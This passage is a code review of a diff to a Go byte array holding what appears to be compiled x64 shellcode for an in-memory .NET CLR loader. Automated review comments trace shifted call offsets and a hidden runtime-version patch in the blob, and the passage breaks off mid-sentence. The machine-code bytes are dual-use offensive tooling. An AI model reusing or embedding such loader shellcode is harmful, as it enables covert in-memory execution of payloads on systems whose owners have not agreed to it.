hr = pa->icmh->lpVtbl->GetRuntime(
pa->icmh, buf,
(REFIID)&inst->xIID_ICLRRuntimeInfo, (LPVOID)&pa->icri);
}
if(SUCCEEDED(hr)) {
DPRINT("ICLRRuntimeInfo::IsLoadable");
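Review bot: Patching `mod->runtime` in place at fixed indices (`mod->runtime[1]='4'` through `mod->runtime[9]='9'`) only yields "v4.0.30319" when the buffer already holds a ten-character string of the same shape; if the generator stored a shorter or empty value, the writes land beyond the terminator and produce a string `GetRuntime` will reject, and the logic silently discards whatever version the user selected with `-r`. Prefer calling `GetRuntime` with the configured `mod->runtime` first and only then falling back, write each fallback as a whole string with a bounded copy instead of per-character edits, factor the repeated `GetRuntime` call into a loop over the candidate versions, and restore the commented-out `DPRINT` so the version actually requested shows up in debug output.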

View File

@ -7,24 +7,24 @@ var LOADER_EXE_X64 = []byte{
0x74, 0x24, 0x18, 0x57, 0x41, 0x56, 0x41, 0x57, 0x48, 0x81, 0xec, 0x00,
0x05, 0x00, 0x00, 0x33, 0xff, 0x48, 0x8b, 0xd9, 0x39, 0xb9, 0x38, 0x02,
0x00, 0x00, 0x0f, 0x84, 0xce, 0x00, 0x00, 0x00, 0x4c, 0x8b, 0x41, 0x28,
0x48, 0x8b, 0x91, 0x88, 0x00, 0x00, 0x00, 0xe8, 0x34, 0x2e, 0x00, 0x00,
0x48, 0x8b, 0x91, 0x88, 0x00, 0x00, 0x00, 0xe8, 0x94, 0x2e, 0x00, 0x00,
0x48, 0x85, 0xc0, 0x0f, 0x84, 0xaf, 0x00, 0x00, 0x00, 0x48, 0x21, 0x7c,
0x24, 0x28, 0x4c, 0x8d, 0x05, 0x77, 0x13, 0x00, 0x00, 0x21, 0x7c, 0x24,
0x24, 0x28, 0x4c, 0x8d, 0x05, 0xd7, 0x13, 0x00, 0x00, 0x21, 0x7c, 0x24,
0x20, 0x4c, 0x8b, 0xcb, 0x33, 0xd2, 0x33, 0xc9, 0xff, 0xd0, 0x4c, 0x8b,
0x43, 0x28, 0x48, 0x8b, 0xcb, 0x48, 0x8b, 0x93, 0x08, 0x02, 0x00, 0x00,
0x48, 0x8b, 0xf8, 0xe8, 0xfc, 0x2d, 0x00, 0x00, 0x4c, 0x8b, 0x43, 0x28,
0x48, 0x8b, 0xf8, 0xe8, 0x5c, 0x2e, 0x00, 0x00, 0x4c, 0x8b, 0x43, 0x28,
0x48, 0x8b, 0xcb, 0x48, 0x8b, 0x93, 0xa0, 0x00, 0x00, 0x00, 0x4c, 0x8b,
0xf0, 0xe8, 0xe6, 0x2d, 0x00, 0x00, 0x4c, 0x8b, 0x43, 0x28, 0x48, 0x8b,
0xf0, 0xe8, 0x46, 0x2e, 0x00, 0x00, 0x4c, 0x8b, 0x43, 0x28, 0x48, 0x8b,
0xcb, 0x48, 0x8b, 0x93, 0xa8, 0x00, 0x00, 0x00, 0x48, 0x8b, 0xf0, 0xe8,
0xd0, 0x2d, 0x00, 0x00, 0x33, 0xc9, 0x48, 0x8b, 0xe8, 0xff, 0x53, 0x40,
0x30, 0x2e, 0x00, 0x00, 0x33, 0xc9, 0x48, 0x8b, 0xe8, 0xff, 0x53, 0x40,
0x4c, 0x8b, 0xf8, 0x4d, 0x85, 0xf6, 0x74, 0x4f, 0x48, 0x85, 0xf6, 0x74,
0x4a, 0x48, 0x85, 0xed, 0x74, 0x45, 0xc7, 0x44, 0x24, 0x60, 0x0b, 0x00,
0x10, 0x00, 0xff, 0xd5, 0x48, 0x8b, 0xc8, 0x48, 0x8d, 0x54, 0x24, 0x30,
0xff, 0xd6, 0x8b, 0x83, 0x38, 0x02, 0x00, 0x00, 0x48, 0x8d, 0x4c, 0x24,
0x30, 0x48, 0x83, 0xa4, 0x24, 0xc8, 0x00, 0x00, 0x00, 0xf0, 0x49, 0x03,
0xc7, 0x33, 0xd2, 0x48, 0x89, 0x84, 0x24, 0x28, 0x01, 0x00, 0x00, 0x41,
0xff, 0xd6, 0xeb, 0x0b, 0x48, 0x83, 0xc8, 0xff, 0xeb, 0x08, 0xe8, 0xc9,
0x12, 0x00, 0x00, 0x48, 0x8b, 0xc7, 0x4c, 0x8d, 0x9c, 0x24, 0x00, 0x05,
0xff, 0xd6, 0xeb, 0x0b, 0x48, 0x83, 0xc8, 0xff, 0xeb, 0x08, 0xe8, 0x29,
0x13, 0x00, 0x00, 0x48, 0x8b, 0xc7, 0x4c, 0x8d, 0x9c, 0x24, 0x00, 0x05,
0x00, 0x00, 0x49, 0x8b, 0x5b, 0x20, 0x49, 0x8b, 0x6b, 0x28, 0x49, 0x8b,
0x73, 0x30, 0x49, 0x8b, 0xe3, 0x41, 0x5f, 0x41, 0x5e, 0x5f, 0xc3, 0xcc,
0xf0, 0xff, 0x41, 0x08, 0x8b, 0x41, 0x08, 0xc3, 0xb8, 0x01, 0x40, 0x00,
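Review bot: This hunk is a regenerated loader blob (every relocated displacement moves by 0x60, for example `0xe8, 0x34, 0x2e` becoming `0xe8, 0x94, 0x2e`, which matches the code inserted in `LoadAssembly`), and reviewers cannot verify it from the bytes alone. Please state in the commit message which loader source revision and toolchain produced `LOADER_EXE_X64` so the array can be rebuilt reproducibly and compared.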
@ -52,7 +52,7 @@ var LOADER_EXE_X64 = []byte{
0x5b, 0xc3, 0xcc, 0xcc, 0x48, 0x8b, 0xc4, 0x53, 0x48, 0x83, 0xec, 0x60,
0x83, 0x60, 0x20, 0x00, 0x48, 0x8d, 0x48, 0xb8, 0x83, 0x60, 0x18, 0x00,
0x48, 0x8b, 0xda, 0x83, 0x60, 0x10, 0x00, 0x33, 0xd2, 0x44, 0x8d, 0x42,
0x40, 0xe8, 0xbe, 0x31, 0x00, 0x00, 0x48, 0x8b, 0x03, 0x48, 0x8d, 0x54,
0x40, 0xe8, 0x1e, 0x32, 0x00, 0x00, 0x48, 0x8b, 0x03, 0x48, 0x8d, 0x54,
0x24, 0x20, 0x48, 0x8b, 0xcb, 0xff, 0x50, 0x18, 0x85, 0xc0, 0x75, 0x1e,
0x48, 0x8b, 0x03, 0x4c, 0x8d, 0x4c, 0x24, 0x78, 0x4c, 0x8d, 0x84, 0x24,
0x80, 0x00, 0x00, 0x00, 0x48, 0x8b, 0xcb, 0x48, 0x8d, 0x94, 0x24, 0x88,
@ -73,38 +73,38 @@ var LOADER_EXE_X64 = []byte{
0x28, 0x83, 0x20, 0x00, 0x33, 0xc0, 0xc3, 0xcc, 0x8d, 0x04, 0x11, 0xc3,
0x48, 0x89, 0x5c, 0x24, 0x18, 0x55, 0x56, 0x57, 0x41, 0x56, 0x41, 0x57,
0x48, 0x83, 0xec, 0x20, 0x48, 0x8d, 0x91, 0x54, 0x03, 0x00, 0x00, 0x48,
0x8b, 0xd9, 0xe8, 0x91, 0x28, 0x00, 0x00, 0x48, 0x8b, 0xf0, 0x48, 0x85,
0x8b, 0xd9, 0xe8, 0xf1, 0x28, 0x00, 0x00, 0x48, 0x8b, 0xf0, 0x48, 0x85,
0xc0, 0x75, 0x0a, 0xb8, 0x01, 0x00, 0x00, 0x00, 0xe9, 0xe7, 0x00, 0x00,
0x00, 0x4c, 0x8d, 0x83, 0xc8, 0x05, 0x00, 0x00, 0x45, 0x33, 0xc9, 0x48,
0x8b, 0xd6, 0x48, 0x8b, 0xcb, 0xe8, 0x52, 0x29, 0x00, 0x00, 0x48, 0x8b,
0x8b, 0xd6, 0x48, 0x8b, 0xcb, 0xe8, 0xb2, 0x29, 0x00, 0x00, 0x48, 0x8b,
0xe8, 0x48, 0x85, 0xc0, 0x0f, 0x84, 0xc4, 0x00, 0x00, 0x00, 0x48, 0x8d,
0x3d, 0x8f, 0xff, 0xff, 0xff, 0x4c, 0x8d, 0x3d, 0x7c, 0xff, 0xff, 0xff,
0x41, 0x2b, 0xff, 0x0f, 0x88, 0xad, 0x00, 0x00, 0x00, 0x4c, 0x8d, 0x4c,
0x24, 0x50, 0x8b, 0xd7, 0x41, 0xb8, 0x40, 0x00, 0x00, 0x00, 0x44, 0x8b,
0xf7, 0x48, 0x8b, 0xc8, 0xff, 0x53, 0x60, 0x85, 0xc0, 0x0f, 0x84, 0x8f,
0x00, 0x00, 0x00, 0x44, 0x8b, 0xc7, 0x49, 0x8b, 0xd7, 0x48, 0x8b, 0xcd,
0xe8, 0x2b, 0x30, 0x00, 0x00, 0x44, 0x8b, 0x44, 0x24, 0x50, 0x4c, 0x8d,
0xe8, 0x8b, 0x30, 0x00, 0x00, 0x44, 0x8b, 0x44, 0x24, 0x50, 0x4c, 0x8d,
0x4c, 0x24, 0x58, 0x41, 0x8b, 0xd6, 0x48, 0x8b, 0xcd, 0xff, 0x53, 0x60,
0x4c, 0x8d, 0x83, 0xd8, 0x05, 0x00, 0x00, 0x45, 0x33, 0xc9, 0x48, 0x8b,
0xd6, 0x48, 0x8b, 0xcb, 0xe8, 0xdb, 0x28, 0x00, 0x00, 0x48, 0x8b, 0xf0,
0xd6, 0x48, 0x8b, 0xcb, 0xe8, 0x3b, 0x29, 0x00, 0x00, 0x48, 0x8b, 0xf0,
0x48, 0x85, 0xc0, 0x74, 0x51, 0x48, 0x8d, 0x3d, 0x30, 0xff, 0xff, 0xff,
0x4c, 0x8d, 0x35, 0x1d, 0xff, 0xff, 0xff, 0x41, 0x2b, 0xfe, 0x78, 0x3e,
0x4c, 0x8d, 0x4c, 0x24, 0x50, 0x8b, 0xd7, 0x41, 0xb8, 0x40, 0x00, 0x00,
0x00, 0x8b, 0xef, 0x48, 0x8b, 0xc8, 0xff, 0x53, 0x60, 0x85, 0xc0, 0x74,
0x25, 0x44, 0x8b, 0xc7, 0x49, 0x8b, 0xd6, 0x48, 0x8b, 0xce, 0xe8, 0xc1,
0x2f, 0x00, 0x00, 0x44, 0x8b, 0x44, 0x24, 0x50, 0x4c, 0x8d, 0x4c, 0x24,
0x25, 0x44, 0x8b, 0xc7, 0x49, 0x8b, 0xd6, 0x48, 0x8b, 0xce, 0xe8, 0x21,
0x30, 0x00, 0x00, 0x44, 0x8b, 0x44, 0x24, 0x50, 0x4c, 0x8d, 0x4c, 0x24,
0x58, 0x8b, 0xd5, 0x48, 0x8b, 0xce, 0xff, 0x53, 0x60, 0xe9, 0x11, 0xff,
0xff, 0xff, 0x33, 0xc0, 0x48, 0x8b, 0x5c, 0x24, 0x60, 0x48, 0x83, 0xc4,
0x20, 0x41, 0x5f, 0x41, 0x5e, 0x5f, 0x5e, 0x5d, 0xc3, 0xcc, 0xcc, 0xcc,
0x48, 0x89, 0x5c, 0x24, 0x18, 0x48, 0x89, 0x74, 0x24, 0x20, 0x57, 0x48,
0x83, 0xec, 0x20, 0x48, 0x8d, 0x91, 0x68, 0x03, 0x00, 0x00, 0x48, 0x8b,
0xd9, 0xe8, 0x66, 0x27, 0x00, 0x00, 0x4c, 0x8d, 0x83, 0xe8, 0x05, 0x00,
0x00, 0x45, 0x33, 0xc9, 0x48, 0x8b, 0xd0, 0x48, 0x8b, 0xcb, 0xe8, 0x39,
0xd9, 0xe8, 0xc6, 0x27, 0x00, 0x00, 0x4c, 0x8d, 0x83, 0xe8, 0x05, 0x00,
0x00, 0x45, 0x33, 0xc9, 0x48, 0x8b, 0xd0, 0x48, 0x8b, 0xcb, 0xe8, 0x99,
0x28, 0x00, 0x00, 0x48, 0x8b, 0xf8, 0x48, 0x85, 0xc0, 0x74, 0x42, 0xbe,
0x01, 0x00, 0x00, 0x00, 0x4c, 0x8d, 0x4c, 0x24, 0x30, 0x8b, 0xd6, 0x48,
0x8b, 0xc8, 0x44, 0x8d, 0x46, 0x3f, 0xff, 0x53, 0x60, 0x85, 0xc0, 0x74,
0x28, 0x48, 0x8d, 0x93, 0x0c, 0x06, 0x00, 0x00, 0x44, 0x8b, 0xc6, 0x48,
0x8b, 0xcf, 0xe8, 0x2d, 0x2f, 0x00, 0x00, 0x44, 0x8b, 0x44, 0x24, 0x30,
0x8b, 0xcf, 0xe8, 0x8d, 0x2f, 0x00, 0x00, 0x44, 0x8b, 0x44, 0x24, 0x30,
0x4c, 0x8d, 0x4c, 0x24, 0x38, 0x8b, 0xd6, 0x48, 0x8b, 0xcf, 0xff, 0x53,
0x60, 0x8b, 0xc6, 0xeb, 0x02, 0x33, 0xc0, 0x48, 0x8b, 0x5c, 0x24, 0x40,
0x48, 0x8b, 0x74, 0x24, 0x48, 0x48, 0x83, 0xc4, 0x20, 0x5f, 0xc3, 0xcc,
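Review bot: every changed pair in this hunk is a forward e8 call whose rel32 grows by exactly 0x60 and nothing else moves: 0x2891 to 0x28f1, 0x2952 to 0x29b2, 0x302b to 0x308b, 0x28db to 0x293b, 0x2fc1 to 0x3021, 0x2766 to 0x27c6, 0x2839 to 0x2899, 0x2f2d to 0x2f8d. That is consistent with one 0x60-byte insertion further down and carries no logic of its own, so the reviewable artefact is the C source this loader was compiled from, which should be part of the same commit, and the byte array should be regenerated by the build from that source rather than patched by hand.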
@ -113,7 +113,7 @@ var LOADER_EXE_X64 = []byte{
0x78, 0x03, 0x00, 0x00, 0x45, 0x33, 0xff, 0x48, 0x8b, 0xf9, 0x44, 0x21,
0xbd, 0xd8, 0x02, 0x00, 0x00, 0x48, 0x8d, 0x4c, 0x24, 0x60, 0x33, 0xd2,
0x33, 0xf6, 0xbb, 0x00, 0x03, 0x60, 0x04, 0x45, 0x8d, 0x77, 0x68, 0x45,
0x8b, 0xc6, 0xe8, 0xe1, 0x2e, 0x00, 0x00, 0xb9, 0x04, 0x01, 0x00, 0x00,
0x8b, 0xc6, 0xe8, 0x41, 0x2f, 0x00, 0x00, 0xb9, 0x04, 0x01, 0x00, 0x00,
0x44, 0x89, 0x74, 0x24, 0x60, 0x89, 0x4d, 0x80, 0x48, 0x8d, 0x85, 0x60,
0x01, 0x00, 0x00, 0x48, 0x89, 0x44, 0x24, 0x78, 0x4c, 0x8d, 0x4c, 0x24,
0x60, 0x89, 0x4d, 0xb0, 0x48, 0x8d, 0x45, 0x50, 0x48, 0x89, 0x45, 0xa8,
@ -189,9 +189,9 @@ var LOADER_EXE_X64 = []byte{
0xc0, 0x74, 0x5a, 0x33, 0xc9, 0x8b, 0xd0, 0x41, 0xb8, 0x00, 0x30, 0x00,
0x00, 0x44, 0x8d, 0x49, 0x04, 0xff, 0x57, 0x48, 0x48, 0x89, 0x87, 0x60,
0x0d, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x17, 0x44, 0x8b, 0x85, 0xc0,
0x02, 0x00, 0x00, 0x49, 0x8b, 0xd7, 0x48, 0x8b, 0xc8, 0xe8, 0x2a, 0x2b,
0x02, 0x00, 0x00, 0x49, 0x8b, 0xd7, 0x48, 0x8b, 0xc8, 0xe8, 0x8a, 0x2b,
0x00, 0x00, 0x41, 0x8b, 0xf4, 0xeb, 0x02, 0x8b, 0xf3, 0x44, 0x8b, 0x85,
0xc0, 0x02, 0x00, 0x00, 0x33, 0xd2, 0x49, 0x8b, 0xcf, 0xe8, 0x32, 0x2b,
0xc0, 0x02, 0x00, 0x00, 0x33, 0xd2, 0x49, 0x8b, 0xcf, 0xe8, 0x92, 0x2b,
0x00, 0x00, 0x41, 0xff, 0x55, 0x00, 0x4d, 0x8b, 0xc7, 0x41, 0x8b, 0xd4,
0x48, 0x8b, 0xc8, 0xff, 0x97, 0xe0, 0x00, 0x00, 0x00, 0x4c, 0x8b, 0x6c,
0x24, 0x48, 0x49, 0x8b, 0xce, 0xff, 0x97, 0x70, 0x01, 0x00, 0x00, 0x49,
@ -200,8 +200,8 @@ var LOADER_EXE_X64 = []byte{
0x74, 0x48, 0x83, 0xbf, 0x34, 0x02, 0x00, 0x00, 0x03, 0x75, 0x3f, 0x48,
0x8b, 0x9f, 0x60, 0x0d, 0x00, 0x00, 0x48, 0x8d, 0x97, 0x48, 0x0d, 0x00,
0x00, 0x44, 0x8b, 0x8f, 0x58, 0x0d, 0x00, 0x00, 0x48, 0x8d, 0x8f, 0x38,
0x0d, 0x00, 0x00, 0x4c, 0x8b, 0xc3, 0xe8, 0xdd, 0x26, 0x00, 0x00, 0x48,
0x8b, 0x57, 0x28, 0x48, 0x8d, 0x8f, 0x2c, 0x0c, 0x00, 0x00, 0xe8, 0x8d,
0x0d, 0x00, 0x00, 0x4c, 0x8b, 0xc3, 0xe8, 0x3d, 0x27, 0x00, 0x00, 0x48,
0x8b, 0x57, 0x28, 0x48, 0x8d, 0x8f, 0x2c, 0x0c, 0x00, 0x00, 0xe8, 0xed,
0x25, 0x00, 0x00, 0x48, 0x3b, 0x83, 0x18, 0x05, 0x00, 0x00, 0x41, 0x0f,
0x45, 0xf6, 0x8b, 0xc6, 0xeb, 0x02, 0x33, 0xc0, 0x48, 0x81, 0xc4, 0x78,
0x03, 0x00, 0x00, 0x41, 0x5f, 0x41, 0x5e, 0x41, 0x5d, 0x41, 0x5c, 0x5f,
@ -218,10 +218,10 @@ var LOADER_EXE_X64 = []byte{
0x8a, 0x00, 0x84, 0xc0, 0x74, 0x14, 0x33, 0xd2, 0xff, 0xc1, 0x0c, 0x20,
0x88, 0x44, 0x15, 0xf0, 0x8b, 0xd1, 0x42, 0x8a, 0x04, 0x01, 0x84, 0xc0,
0x75, 0xee, 0xc6, 0x44, 0x0d, 0xf0, 0x00, 0x49, 0x8b, 0xd1, 0x48, 0x8d,
0x4d, 0xf0, 0xe8, 0xc9, 0x24, 0x00, 0x00, 0x48, 0x89, 0x44, 0x24, 0x20,
0x4d, 0xf0, 0xe8, 0x29, 0x25, 0x00, 0x00, 0x48, 0x89, 0x44, 0x24, 0x20,
0x48, 0x8b, 0x85, 0x58, 0x01, 0x00, 0x00, 0x8d, 0x4e, 0xff, 0x48, 0x8b,
0x95, 0x68, 0x01, 0x00, 0x00, 0x8b, 0xf1, 0x44, 0x8b, 0xf9, 0x8b, 0x0c,
0x88, 0x48, 0x03, 0xcb, 0xe8, 0xa3, 0x24, 0x00, 0x00, 0x48, 0x33, 0x44,
0x88, 0x48, 0x03, 0xcb, 0xe8, 0x03, 0x25, 0x00, 0x00, 0x48, 0x33, 0x44,
0x24, 0x20, 0x48, 0x3b, 0x85, 0x60, 0x01, 0x00, 0x00, 0x74, 0x1a, 0x85,
0xf6, 0x75, 0xcd, 0x33, 0xc0, 0x48, 0x81, 0xc4, 0x08, 0x02, 0x00, 0x00,
0x41, 0x5f, 0x41, 0x5e, 0x41, 0x5d, 0x41, 0x5c, 0x5f, 0x5e, 0x5b, 0x5d,
@ -249,10 +249,10 @@ var LOADER_EXE_X64 = []byte{
0xf9, 0x4c, 0x8b, 0x50, 0x60, 0x49, 0x8b, 0x42, 0x18, 0x48, 0x8b, 0x58,
0x10, 0x4c, 0x39, 0x5b, 0x30, 0x74, 0x2e, 0x4d, 0x85, 0xdb, 0x75, 0x4a,
0x48, 0x8b, 0x53, 0x30, 0x48, 0x3b, 0xd5, 0x74, 0x11, 0x45, 0x33, 0xc9,
0x4c, 0x8b, 0xc6, 0x48, 0x8b, 0xcf, 0xe8, 0x35, 0x21, 0x00, 0x00, 0x4c,
0x4c, 0x8b, 0xc6, 0x48, 0x8b, 0xcf, 0xe8, 0x95, 0x21, 0x00, 0x00, 0x4c,
0x8b, 0xd8, 0x48, 0x8b, 0x1b, 0x48, 0x83, 0x7b, 0x30, 0x00, 0x75, 0xd7,
0x4d, 0x85, 0xdb, 0x75, 0x21, 0x49, 0x8b, 0xd6, 0x48, 0x8b, 0xcf, 0xe8,
0x30, 0x20, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x0e, 0x48, 0x8b, 0xd6,
0x90, 0x20, 0x00, 0x00, 0x48, 0x85, 0xc0, 0x74, 0x0e, 0x48, 0x8b, 0xd6,
0x48, 0x8b, 0xc8, 0xff, 0x57, 0x38, 0x4c, 0x8b, 0xd8, 0xeb, 0x03, 0x45,
0x33, 0xdb, 0x48, 0x8b, 0x5c, 0x24, 0x30, 0x49, 0x8b, 0xc3, 0x48, 0x8b,
0x6c, 0x24, 0x38, 0x48, 0x8b, 0x74, 0x24, 0x40, 0x48, 0x8b, 0x7c, 0x24,
@ -362,7 +362,7 @@ var LOADER_EXE_X64 = []byte{
0x04, 0x0a, 0x41, 0xff, 0xc1, 0x48, 0xff, 0xc1, 0x49, 0xff, 0xc0, 0x8a,
0x01, 0x84, 0xc0, 0x75, 0xe1, 0x4d, 0x85, 0xc0, 0x74, 0x27, 0x49, 0x63,
0xc9, 0x48, 0x8b, 0xd7, 0x48, 0xff, 0xc1, 0x42, 0xc6, 0x44, 0x04, 0x20,
0x00, 0x48, 0x03, 0xd9, 0x48, 0x8d, 0x4c, 0x24, 0x20, 0xe8, 0x4a, 0x23,
0x00, 0x48, 0x03, 0xd9, 0x48, 0x8d, 0x4c, 0x24, 0x20, 0xe8, 0xaa, 0x23,
0x00, 0x00, 0x85, 0xc0, 0x75, 0xa5, 0xb8, 0x01, 0x00, 0x00, 0x00, 0xeb,
0x02, 0x33, 0xc0, 0x48, 0x8b, 0x9c, 0x24, 0xb0, 0x00, 0x00, 0x00, 0x48,
0x81, 0xc4, 0xa0, 0x00, 0x00, 0x00, 0x5f, 0xc3, 0x40, 0x53, 0x48, 0x83,
@ -376,31 +376,39 @@ var LOADER_EXE_X64 = []byte{
0x10, 0x48, 0x89, 0x6c, 0x24, 0x18, 0x56, 0x57, 0x41, 0x54, 0x41, 0x56,
0x41, 0x57, 0x48, 0x81, 0xec, 0x30, 0x02, 0x00, 0x00, 0x4c, 0x8b, 0x89,
0xa0, 0x01, 0x00, 0x00, 0x33, 0xc0, 0x45, 0x33, 0xe4, 0x49, 0x8b, 0xf0,
0x48, 0x8b, 0xea, 0x48, 0x8b, 0xf9, 0x41, 0xbf, 0x00, 0x01, 0x00, 0x00,
0x4d, 0x85, 0xc9, 0x0f, 0x84, 0x9a, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x91,
0x60, 0x08, 0x00, 0x00, 0x48, 0x81, 0xc1, 0x50, 0x08, 0x00, 0x00, 0x41,
0xff, 0xd1, 0x85, 0xc0, 0x0f, 0x88, 0xba, 0x00, 0x00, 0x00, 0x48, 0x8d,
0x44, 0x24, 0x30, 0x44, 0x89, 0x7c, 0x24, 0x28, 0x4c, 0x8d, 0x45, 0x0c,
0x48, 0x89, 0x44, 0x24, 0x20, 0x41, 0x83, 0xc9, 0xff, 0x33, 0xd2, 0x33,
0xc9, 0xff, 0x57, 0x70, 0x48, 0x8b, 0x0e, 0x48, 0x8d, 0x5e, 0x08, 0x4c,
0x8d, 0x87, 0x70, 0x08, 0x00, 0x00, 0x4c, 0x8b, 0xcb, 0x48, 0x8d, 0x54,
0x24, 0x30, 0x48, 0x8b, 0x01, 0xff, 0x50, 0x18, 0x85, 0xc0, 0x78, 0x3c,
0x48, 0x8b, 0x0b, 0x48, 0x8d, 0x94, 0x24, 0x60, 0x02, 0x00, 0x00, 0x48,
0x8b, 0x01, 0xff, 0x50, 0x50, 0x85, 0xc0, 0x78, 0x37, 0x44, 0x39, 0xa4,
0x24, 0x60, 0x02, 0x00, 0x00, 0x74, 0x20, 0x48, 0x8b, 0x0b, 0x4c, 0x8d,
0x4e, 0x10, 0x4c, 0x8d, 0x87, 0x90, 0x08, 0x00, 0x00, 0x48, 0x8d, 0x97,
0x80, 0x08, 0x00, 0x00, 0x48, 0x8b, 0x01, 0xff, 0x50, 0x48, 0xeb, 0x03,
0x4c, 0x21, 0x23, 0x85, 0xc0, 0x78, 0x09, 0x4c, 0x39, 0xa7, 0xa0, 0x01,
0x00, 0x00, 0x75, 0x21, 0x48, 0x8d, 0x46, 0x10, 0x33, 0xd2, 0x4c, 0x8d,
0x8f, 0x90, 0x08, 0x00, 0x00, 0x48, 0x89, 0x44, 0x24, 0x20, 0x4c, 0x8d,
0x87, 0x80, 0x08, 0x00, 0x00, 0x33, 0xc9, 0xff, 0x97, 0x98, 0x01, 0x00,
0x00, 0x85, 0xc0, 0x79, 0x10, 0x4c, 0x21, 0x66, 0x10, 0x33, 0xc0, 0xe9,
0x45, 0x01, 0x00, 0x00, 0x4c, 0x21, 0x26, 0xeb, 0xcb, 0x48, 0x8b, 0x4e,
0x10, 0x48, 0x8b, 0x01, 0xff, 0x50, 0x50, 0x85, 0xc0, 0x0f, 0x88, 0x2b,
0x01, 0x00, 0x00, 0x4c, 0x8d, 0x85, 0x0c, 0x01, 0x00, 0x00, 0x4c, 0x8d,
0x76, 0x18, 0x45, 0x38, 0x20, 0x75, 0x12, 0x48, 0x8b, 0x4e, 0x10, 0x49,
0x8b, 0xd6, 0x48, 0x8b, 0x01, 0xff, 0x50, 0x68, 0x44, 0x8b, 0xf8, 0xeb,
0x48, 0x48, 0x8d, 0x44, 0x24, 0x30, 0x44, 0x89, 0x7c, 0x24, 0x28, 0x41,
0x48, 0x8b, 0xea, 0x48, 0x8b, 0xf9, 0x4d, 0x85, 0xc9, 0x0f, 0x84, 0xfd,
0x00, 0x00, 0x00, 0x48, 0x8d, 0x91, 0x60, 0x08, 0x00, 0x00, 0x48, 0x81,
0xc1, 0x50, 0x08, 0x00, 0x00, 0x41, 0xff, 0xd1, 0x85, 0xc0, 0x0f, 0x88,
0x1d, 0x01, 0x00, 0x00, 0x48, 0x8d, 0x44, 0x24, 0x30, 0xc7, 0x44, 0x24,
0x28, 0x00, 0x01, 0x00, 0x00, 0x41, 0x83, 0xc9, 0xff, 0x48, 0x89, 0x44,
0x24, 0x20, 0x4c, 0x8d, 0x45, 0x0c, 0xc6, 0x45, 0x0d, 0x34, 0x33, 0xd2,
0xc6, 0x45, 0x11, 0x33, 0x33, 0xc9, 0x66, 0xc7, 0x45, 0x13, 0x33, 0x31,
0xc6, 0x45, 0x15, 0x39, 0xff, 0x57, 0x70, 0x48, 0x8b, 0x0e, 0x48, 0x8d,
0x5e, 0x08, 0x4c, 0x8d, 0xbf, 0x70, 0x08, 0x00, 0x00, 0x4c, 0x8b, 0xcb,
0x4d, 0x8b, 0xc7, 0x48, 0x8d, 0x54, 0x24, 0x30, 0x48, 0x8b, 0x01, 0xff,
0x50, 0x18, 0x85, 0xc0, 0x79, 0x4b, 0x48, 0x8d, 0x44, 0x24, 0x30, 0xc7,
0x44, 0x24, 0x28, 0x00, 0x01, 0x00, 0x00, 0x41, 0x83, 0xc9, 0xff, 0x48,
0x89, 0x44, 0x24, 0x20, 0x4c, 0x8d, 0x45, 0x0c, 0xc6, 0x45, 0x0d, 0x32,
0x33, 0xd2, 0xc6, 0x45, 0x11, 0x35, 0x33, 0xc9, 0x66, 0xc7, 0x45, 0x13,
0x37, 0x32, 0xc6, 0x45, 0x15, 0x37, 0xff, 0x57, 0x70, 0x48, 0x8b, 0x0e,
0x48, 0x8d, 0x54, 0x24, 0x30, 0x4c, 0x8b, 0xcb, 0x4d, 0x8b, 0xc7, 0x48,
0x8b, 0x01, 0xff, 0x50, 0x18, 0x85, 0xc0, 0x78, 0x3c, 0x48, 0x8b, 0x0b,
0x48, 0x8d, 0x94, 0x24, 0x60, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x01, 0xff,
0x50, 0x50, 0x85, 0xc0, 0x78, 0x37, 0x44, 0x39, 0xa4, 0x24, 0x60, 0x02,
0x00, 0x00, 0x74, 0x20, 0x48, 0x8b, 0x0b, 0x4c, 0x8d, 0x4e, 0x10, 0x4c,
0x8d, 0x87, 0x90, 0x08, 0x00, 0x00, 0x48, 0x8d, 0x97, 0x80, 0x08, 0x00,
0x00, 0x48, 0x8b, 0x01, 0xff, 0x50, 0x48, 0xeb, 0x03, 0x4c, 0x21, 0x23,
0x85, 0xc0, 0x78, 0x09, 0x4c, 0x39, 0xa7, 0xa0, 0x01, 0x00, 0x00, 0x75,
0x21, 0x48, 0x8d, 0x46, 0x10, 0x33, 0xd2, 0x4c, 0x8d, 0x8f, 0x90, 0x08,
0x00, 0x00, 0x48, 0x89, 0x44, 0x24, 0x20, 0x4c, 0x8d, 0x87, 0x80, 0x08,
0x00, 0x00, 0x33, 0xc9, 0xff, 0x97, 0x98, 0x01, 0x00, 0x00, 0x85, 0xc0,
0x79, 0x10, 0x4c, 0x21, 0x66, 0x10, 0x33, 0xc0, 0xe9, 0x48, 0x01, 0x00,
0x00, 0x4c, 0x21, 0x26, 0xeb, 0xcb, 0x48, 0x8b, 0x4e, 0x10, 0x48, 0x8b,
0x01, 0xff, 0x50, 0x50, 0x85, 0xc0, 0x0f, 0x88, 0x2e, 0x01, 0x00, 0x00,
0x4c, 0x8d, 0x85, 0x0c, 0x01, 0x00, 0x00, 0x4c, 0x8d, 0x76, 0x18, 0x45,
0x38, 0x20, 0x75, 0x12, 0x48, 0x8b, 0x4e, 0x10, 0x49, 0x8b, 0xd6, 0x48,
0x8b, 0x01, 0xff, 0x50, 0x68, 0x44, 0x8b, 0xf8, 0xeb, 0x4b, 0x48, 0x8d,
0x44, 0x24, 0x30, 0xc7, 0x44, 0x24, 0x28, 0x00, 0x01, 0x00, 0x00, 0x41,
0x83, 0xc9, 0xff, 0x48, 0x89, 0x44, 0x24, 0x20, 0x33, 0xd2, 0x33, 0xc9,
0xff, 0x57, 0x70, 0x48, 0x8d, 0x4c, 0x24, 0x30, 0xff, 0x97, 0x30, 0x01,
0x00, 0x00, 0x48, 0x8b, 0x4e, 0x10, 0x4d, 0x8b, 0xce, 0x45, 0x33, 0xc0,
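Review bot: this is the one hunk with a behaviour change, and it is hidden in a generated blob, so the C source for it (and a changelog line) belongs in this commit. Decoded, the old lines passed the string at [rbp+0xc] untouched as the r8 argument of the call through [rdi+0x70] (the argument layout is that of MultiByteToWideChar: ecx=0, edx=0, r9d=-1, [rsp+0x20]=wide buffer at rsp+0x30, [rsp+0x28]=0x100) and then called slot 0x18 of the COM object at [rsi] once, testing the result with 78 3c. The new lines first overwrite bytes of that same buffer in place, c6 45 0d 34 / c6 45 11 33 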